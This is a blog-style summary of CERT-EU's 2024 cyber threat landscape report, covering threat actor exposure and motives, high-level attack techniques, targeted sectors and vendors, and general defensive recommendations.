Deep Dive: Analyzing the 2024 Cyber Threat Landscape and Emerging Attack Vectors

Breached Company

Breached Company

4 min read
Deep Dive: Analyzing the 2024 Cyber Threat Landscape and Emerging Attack Vectors

Introduction

The year 2024 witnessed a dynamic and increasingly sophisticated cyber threat landscape, with significant implications for organizations, particularly those within the European Union. CERT-EU's comprehensive analysis of malicious activities targeting Union entities and their vicinity reveals key trends, prevalent techniques, and the most vulnerable sectors. This article delves into these findings, providing a technical breakdown of the observed threats and offering insights for proactive defense strategies.

Key Findings and Trends

  • Elevated Cyberespionage and Prepositioning: A staggering 44% of malicious activities analyzed were classified as cyberespionage or prepositioning, indicating a focus on long-term covert access by state-backed actors.
  • Zero-Day Exploitation: Union entities experienced 15 significant incidents, with five involving the exploitation of zero-day vulnerabilities, highlighting the need for rapid response and patching capabilities.
  • Service Providers as Prime Targets: Threat actors actively targeted service providers, including telecommunications, cybersecurity firms, and remote access providers, underscoring the importance of robust supply chain monitoring.
  • Geopolitical Events as Catalysts: Cyberattacks frequently coincided with global events such as elections, conflicts, and major international conferences, demonstrating the close link between geopolitical developments and cyber threats.
uscertthreatlandscape2024
uscertthreatlandscape2024.pdf
3 MB
download-circle

Threat Actors and Their Motives

In 2024, CERT-EU identified 110 threat actors active against Union entities or their vicinity. The level of exposure varied:

  • Critical Exposure: 20 threat actors successfully breached Union entities.
  • High Exposure: 20 threat actors targeted Union entities but failed to intrude.
  • Medium Exposure: 23 threat actors attempted to scan the networks of Union entities.
  • Low Exposure: 47 threat actors targeted the vicinity of Union entities.

The primary motive for these actors was cyberespionage (44%), followed by cybercrime (20%), hacktivism, and information operations. When the origin of the attacks could be determined, a significant portion was linked to China (28%) and Russia (50%), followed by Iran and North Korea.

Techniques and Attack Vectors

The report identifies several recurring techniques that shaped the threat landscape:

  • Operational Relay Box (ORB) Networks: Threat actors used ORBs, composed of compromised devices like SOHO routers and IP cameras, to obscure their activities and complicate attribution. For example, the China-linked Volt Typhoon exploited legacy vulnerabilities in Cisco and Netgear routers to establish ORB networks.
  • Exploitation of Public-Facing Applications and Edge Devices: APT groups targeted internet-facing systems and edge devices like VPN appliances and firewalls to gain initial access. Vulnerabilities in products like Fortinet FortiGate, Cisco ASA, and Ivanti Connect Secure were actively exploited.
  • Adversary-in-the-Middle (AitM) Attacks: AitM attacks were used to intercept and manipulate communication sessions, bypassing multi-factor authentication (MFA) and other security controls.
  • Living-off-the-Land (LoL) Techniques: Threat actors minimized their footprint by using legitimate system tools like PowerShell and WMI instead of deploying custom malware.
  • Cloud-Based Persistence and API Abuse: Attackers exploited weak API security, misconfigured IAM policies, and exposed cloud secrets to move laterally within cloud environments. The US government experienced a breach via exploited vulnerabilities in BeyondTrust's software.
  • Supply Chain Compromise: APT groups infiltrated third-party vendors and software providers to reach their targets. The Justice AV Solutions Viewer software was compromised via a backdoor.

Targeted Sectors

Besides public administration, the most commonly targeted sectors were defence, transportation, and technology. The finance sector was also frequently targeted, often by hacktivist groups. Diplomatic entities remained a focal point for cyberespionage campaigns.

  • Defense: The ongoing conflicts increased the attractiveness of this sector for threat actors seeking sensitive information related to weapon development and military communications.
  • Transportation: This sector, including maritime, air, and rail transportation, was targeted by cyberespionage, cybercrime, and hacktivist groups.
  • Technology: Malicious actors targeted the technology industry due to its role in the supply chain, seeking to infiltrate downstream clients.

Software Vulnerabilities and Exploitations

In 2024, 110 software products were targeted. Exploitation of internet-facing software products remained a primary initial access vector.

  • Microsoft: Multiple high-impact vulnerabilities across Microsoft products like Windows, NTLMv2, and Microsoft 365 were exploited.
  • Ivanti: Ivanti's Connect Secure and Policy Secure solutions were targeted with remote code execution, authentication bypass, and privilege escalation vulnerabilities.
  • Apple: Apple disclosed multiple vulnerabilities affecting iOS, iPadOS, macOS, and tvOS.
  • Google: Multiple Chrome vulnerabilities were exploited, enabling remote code execution and privilege escalation.
  • Palo Alto Networks: Vulnerabilities in PAN-OS were exploited to execute remote code and escalate privileges.

Service Provider Vulnerabilities

Service providers are prime targets for threat actors. Vendors offering remote access tools, endpoint security, or VPN services are vital for many organizations. Software vendors and cloud service operators were frequently targeted. Telecommunication and Internet Service Providers (ISPs) control vast networks and often store personal data for millions of users.

Proactive Defense Strategies

Based on the 2024 threat landscape, organizations should adopt proactive defense strategies:

  • Prioritize Patching: Rapidly address known vulnerabilities in internet-facing applications, edge devices, and software products, especially zero-day vulnerabilities.
  • Implement Robust Supply Chain Security: Monitor third-party vendors and service providers for potential compromises.
  • Enhance Network Security: Implement network segmentation, intrusion detection systems, and strong perimeter controls to detect and prevent unauthorized access.
  • Strengthen Authentication Mechanisms: Enforce multi-factor authentication (MFA) and monitor for potential AitM attacks.
  • Harden Cloud Environments: Implement strong IAM policies, monitor for API abuse, and secure cloud storage buckets.
  • Employee Training: Educate employees about spearphishing and social engineering tactics.
  • Threat Intelligence: Continuously monitor the threat landscape and adapt security measures to address emerging threats and techniques.

Conclusion

The cyber threat landscape of 2024 was characterized by increased sophistication, a focus on cyberespionage, and the exploitation of service providers and critical software vulnerabilities. By understanding the key trends, techniques, and targeted sectors, organizations can develop proactive defense strategies to mitigate risks and protect their assets. Continuous monitoring, rapid incident response, and robust security controls are essential for navigating the evolving threat landscape and maintaining a strong security posture.

Read more